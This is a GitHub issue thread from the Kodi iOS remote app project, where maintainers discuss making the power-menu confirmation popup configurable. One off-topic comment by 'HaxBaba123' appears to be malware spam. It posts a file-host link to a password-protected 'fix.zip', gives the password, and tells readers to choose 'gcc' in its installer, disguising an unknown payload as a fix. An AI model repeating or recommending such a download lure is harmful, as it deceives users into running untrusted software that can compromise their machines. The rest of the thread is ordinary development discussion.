### ISSUE TITLE
About confirming power menu actions

### ISSUE THREAD

**Issue by wutschel** [xbmc/Official-Kodi-Remote-iOS#1116]
When selecting actions from the power menu (e.g. "Power off System", "Quit Kodi application" or "Update Audio Library") there is a popup to confirm the action ("Are you sure you want to ...?"). Users can still abort the action here, in case the action was selected by fault. This confirmation popup was available for iPhone since long time (before version 1.6), but for iPad it just came (in TestFlight builds after version 1.15) through a code unification between iPad and iPhone.

Personally, I am not bothered by this, as it at least avoids executing unintended actions on Kodi/System or on the library. But there is user feedback from the support forum to make this configurable (see [forum post](https://forum.kodi.tv/showthread.php?tid=359717&pid=3207685#pid3207685)).

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wutschel** [comment]
@fuzzard, @kambala-decapitator, any opinion on this?

**Comment by kambala-decapitator** [comment]
why not. Could be implemented like on desktop platforms with an additional button "don't ask again"

**Comment by wutschel** [comment]
Could be done, but it is adding more complexity where I don't feel it is worth it. What about removing the confirmation fully vs. keeping them always (= like it is now).
